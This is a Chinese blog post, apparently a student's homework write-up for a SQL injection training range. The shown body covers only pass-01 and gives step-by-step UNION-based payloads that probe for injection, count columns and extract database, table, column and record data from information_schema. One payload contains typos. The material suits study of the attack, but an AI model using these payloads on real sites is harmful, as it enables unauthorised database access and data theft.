<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.8.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="pass-01显错注入（一）解题思路123456789101112131415161718192021221.判断是否存在注入：	and 1&#x3D;1 页面回显正常，	and 1&#x3D;2 页面回显失败。	说明可能存在注入2.判断字段数：	and 1&#x3D;2 order by 3页面回显正常	and 1&#x3D;2 order by 4页面回显失败	说明当前表有3个字段3.找出显错位：	and 1&#x3D;2 union sel">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入作业">
<meta property="og:url" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/index.html">
<meta property="og:site_name" content="宋卫冬的博客">
<meta property="og:description" content="pass-01显错注入（一）解题思路123456789101112131415161718192021221.判断是否存在注入：	and 1&#x3D;1 页面回显正常，	and 1&#x3D;2 页面回显失败。	说明可能存在注入2.判断字段数：	and 1&#x3D;2 order by 3页面回显正常	and 1&#x3D;2 order by 4页面回显失败	说明当前表有3个字段3.找出显错位：	and 1&#x3D;2 union sel">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125233836329.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125231730066.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126002420189.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125234118315.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126004853082.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126004328507.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126005404938.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209215938613.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209213845099.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126005928056.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209213547477.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209220418199.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126210801419.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126211222844.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126215740168.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126211759133.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126220702125.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126220844889.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126222934725-16379369772171.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209231519972.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209233411877.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209233748287.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211209234422472.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126224633027.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126225025951.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211210000129383.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211210000215095.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211210000318034.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211210000447018.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211126231110393.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127211402323.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127211831504.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127212544352.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/%E8%A1%A81-16380233536957.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/2021-11-27_221249-16380225607851.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127223525882.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127224407605.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127224546070.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211127224645164.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201204804176.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201205247954.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201205852708.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201210101442.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201210850727.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201211728009.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201210220092.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201212540516.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201213052196.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201220522779.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211201220155520.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125204259532-16378441811501-16378441852562.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125204338972.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125204358071.png">
<meta property="og:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125204412998.png">
<meta property="article:published_time" content="2021-11-25T07:42:45.000Z">
<meta property="article:modified_time" content="2021-12-09T18:34:19.015Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="SQL注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/image-20211125233836329.png">


<link rel="canonical" href="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/","path":"2021/11/25/SQL注入作业/","title":"SQL注入作业"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>SQL注入作业 | 宋卫冬的博客</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">宋卫冬的博客</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
        <li class="menu-item menu-item-schedule"><a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a></li>
        <li class="menu-item menu-item-sitemap"><a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a></li>
        <li class="menu-item menu-item-commonweal"><a href="/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>公益 404</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-01"><span class="nav-number">1.</span> <span class="nav-text">pass-01</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%98%BE%E9%94%99%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%80%EF%BC%89"><span class="nav-number">1.1.</span> <span class="nav-text">显错注入（一）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="nav-number">1.1.1.</span> <span class="nav-text">解题思路</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%BA%93%E5%90%8D%EF%BC%9A"><span class="nav-number">1.1.2.</span> <span class="nav-text">库名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%A1%A8%E5%90%8D%EF%BC%9A"><span class="nav-number">1.1.3.</span> <span class="nav-text">表名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%97%E5%90%8D%EF%BC%9A"><span class="nav-number">1.1.4.</span> <span class="nav-text">列名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE"><span class="nav-number">1.1.5.</span> <span class="nav-text">获取数据</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-02"><span class="nav-number">2.</span> <span class="nav-text">pass-02</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%98%BE%E9%94%99%E6%B3%A8%E5%85%A5%EF%BC%88%E4%BA%8C%EF%BC%89"><span class="nav-number">2.1.</span> <span class="nav-text">显错注入（二）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF-1"><span class="nav-number">2.1.1.</span> <span class="nav-text">解题思路</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E5%BA%93%E5%90%8D%EF%BC%9A"><span class="nav-number">2.1.2.</span> <span class="nav-text">查询库名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E8%A1%A8%E5%90%8D%EF%BC%9A"><span class="nav-number">2.1.3.</span> <span class="nav-text">查询表名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E5%88%97%E5%90%8D%EF%BC%9A"><span class="nav-number">2.1.4.</span> <span class="nav-text">查询列名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE-1"><span class="nav-number">2.1.5.</span> <span class="nav-text">获取数据</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-03"><span class="nav-number">3.</span> <span class="nav-text">pass-03</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%98%BE%E9%94%99%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%89%EF%BC%89"><span class="nav-number">3.1.</span> <span class="nav-text">显错注入（三）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="nav-number">3.1.1.</span> <span class="nav-text">解题思路：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E5%BA%93%E5%90%8D%EF%BC%9A-1"><span class="nav-number">3.1.2.</span> <span class="nav-text">查询库名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E8%A1%A8%E5%90%8D%EF%BC%9A-1"><span class="nav-number">3.1.3.</span> <span class="nav-text">查询表名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E5%88%97%E5%90%8D%EF%BC%9A-1"><span class="nav-number">3.1.4.</span> <span class="nav-text">查询列名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE-2"><span class="nav-number">3.1.5.</span> <span class="nav-text">获取数据</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-04"><span class="nav-number">4.</span> <span class="nav-text">pass-04</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%98%BE%E9%94%99%E6%B3%A8%E5%85%A5%EF%BC%88%E5%9B%9B%EF%BC%89"><span class="nav-number">4.1.</span> <span class="nav-text">显错注入（四）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%EF%BC%9A-1"><span class="nav-number">4.1.1.</span> <span class="nav-text">解题思路：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E5%BA%93%E5%90%8D%EF%BC%9A-2"><span class="nav-number">4.1.2.</span> <span class="nav-text">查询库名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E8%A1%A8%E5%90%8D%EF%BC%9A-2"><span class="nav-number">4.1.3.</span> <span class="nav-text">查询表名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9F%A5%E8%AF%A2%E5%88%97%E5%90%8D%EF%BC%9A-2"><span class="nav-number">4.1.4.</span> <span class="nav-text">查询列名：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E6%95%B0%E6%8D%AE-3"><span class="nav-number">4.1.5.</span> <span class="nav-text">获取数据</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="nav-number">5.</span> <span class="nav-text">总结：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-05"><span class="nav-number">6.</span> <span class="nav-text">pass-05</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-06"><span class="nav-number">7.</span> <span class="nav-text">pass-06</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-07"><span class="nav-number">8.</span> <span class="nav-text">pass-07</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%A1%A8%E5%90%8D"><span class="nav-number">8.1.</span> <span class="nav-text">表名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%97%E5%90%8D"><span class="nav-number">8.2.</span> <span class="nav-text">列名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%AE%B0%E5%BD%95"><span class="nav-number">8.3.</span> <span class="nav-text">记录</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#flag%EF%BC%9A"><span class="nav-number">8.4.</span> <span class="nav-text">flag：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-08"><span class="nav-number">9.</span> <span class="nav-text">pass-08</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%BA%93%E5%90%8D"><span class="nav-number">9.1.</span> <span class="nav-text">库名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%A1%A8%E5%90%8D-1"><span class="nav-number">9.2.</span> <span class="nav-text">表名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%AE%B0%E5%BD%95-1"><span class="nav-number">9.3.</span> <span class="nav-text">记录</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#flag%EF%BC%9A-1"><span class="nav-number">9.4.</span> <span class="nav-text">flag：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-09"><span class="nav-number">10.</span> <span class="nav-text">pass-09</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%A1%A8%E5%90%8D%EF%BC%9A-1"><span class="nav-number">10.1.</span> <span class="nav-text">表名：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%97%E5%90%8D-1"><span class="nav-number">10.2.</span> <span class="nav-text">列名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%AE%B0%E5%BD%95-2"><span class="nav-number">10.3.</span> <span class="nav-text">记录</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#flag"><span class="nav-number">10.4.</span> <span class="nav-text">flag:</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-10"><span class="nav-number">11.</span> <span class="nav-text">pass-10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-11"><span class="nav-number">12.</span> <span class="nav-text">pass-11</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-12"><span class="nav-number">13.</span> <span class="nav-text">pass-12</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-13"><span class="nav-number">14.</span> <span class="nav-text">pass-13</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-14"><span class="nav-number">15.</span> <span class="nav-text">pass-14</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-15"><span class="nav-number">16.</span> <span class="nav-text">pass-15</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-16"><span class="nav-number">17.</span> <span class="nav-text">pass-16</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pass-17"><span class="nav-number">18.</span> <span class="nav-text">pass-17</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86%E5%88%86%E6%9E%90"><span class="nav-number"></span> <span class="nav-text">注入原理分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1%E3%80%81%E4%BB%8B%E7%BB%8Dsql%E6%B3%A8%E5%85%A5%E7%9A%84%E5%8E%9F%E7%90%86"><span class="nav-number">1.</span> <span class="nav-text">1、介绍sql注入的原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2%E3%80%81%E9%9D%B6%E5%9C%BA%E6%BC%94%E7%A4%BAsql%E6%B3%A8%E5%85%A5%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%B5%81%E7%A8%8B"><span class="nav-number">2.</span> <span class="nav-text">2、靶场演示sql注入的基本流程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3%E3%80%81%E8%AE%B2%E8%A7%A3sql%E6%B3%A8%E5%85%A5%E7%9A%84%E4%B8%AD%E9%81%87%E5%88%B0%E7%9A%84%E5%87%BD%E6%95%B0"><span class="nav-number">3.</span> <span class="nav-text">3、讲解sql注入的中遇到的函数</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%98%93%E9%94%99%E5%9B%9E%E7%AD%94%E5%88%86%E6%9E%90"><span class="nav-number"></span> <span class="nav-text">易错回答分析</span></a></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">15</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/11/25/SQL%E6%B3%A8%E5%85%A5%E4%BD%9C%E4%B8%9A/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="宋卫冬的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQL注入作业
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2021-11-25 15:42:45" itemprop="dateCreated datePublished" datetime="2021-11-25T15:42:45+08:00">2021-11-25</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2021-12-10 02:34:19" itemprop="dateModified" datetime="2021-12-10T02:34:19+08:00">2021-12-10</time>
      </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h3 id="pass-01"><a href="#pass-01" class="headerlink" title="pass-01"></a>pass-01</h3><h4 id="显错注入（一）"><a href="#显错注入（一）" class="headerlink" title="显错注入（一）"></a>显错注入（一）</h4><h5 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">1.判断是否存在注入：</span><br><span class="line">	and 1=1 页面回显正常，</span><br><span class="line">	and 1=2 页面回显失败。</span><br><span class="line">	说明可能存在注入</span><br><span class="line">2.判断字段数：</span><br><span class="line">	and 1=2 order by 3页面回显正常</span><br><span class="line">	and 1=2 order by 4页面回显失败</span><br><span class="line">	说明当前表有3个字段</span><br><span class="line">3.找出显错位：</span><br><span class="line">	and 1=2 union select 1,2,3 </span><br><span class="line">	如下图：2，3处为显错位，</span><br><span class="line">4.查询库名</span><br><span class="line">	and 1=2 union select 1,2,database()</span><br><span class="line">5.查询表名</span><br><span class="line">	and 1=2 union select 1,2,table_name from information_schema.tables where table_schema =database() limit 0,1</span><br><span class="line">   【注意】：一、information_schema：mysql数据库自带库</span><br><span class="line">		   二、tables：mysql数据库自带表</span><br><span class="line">		   三、库.表 表示可以访问这个数据库的这个表</span><br><span class="line">6.查询列名</span><br><span class="line">	and 1=2 union select 1,2,column_name frominformation_schema.columns where table_schema =database() where table_name =&#x27;表名&#x27; limit 0,1</span><br><span class="line">7.获取数据</span><br><span class="line">	and 1=2 union select 1,2,group_concat(字段名) from 表名</span><br></pre></td></tr></table></figure>

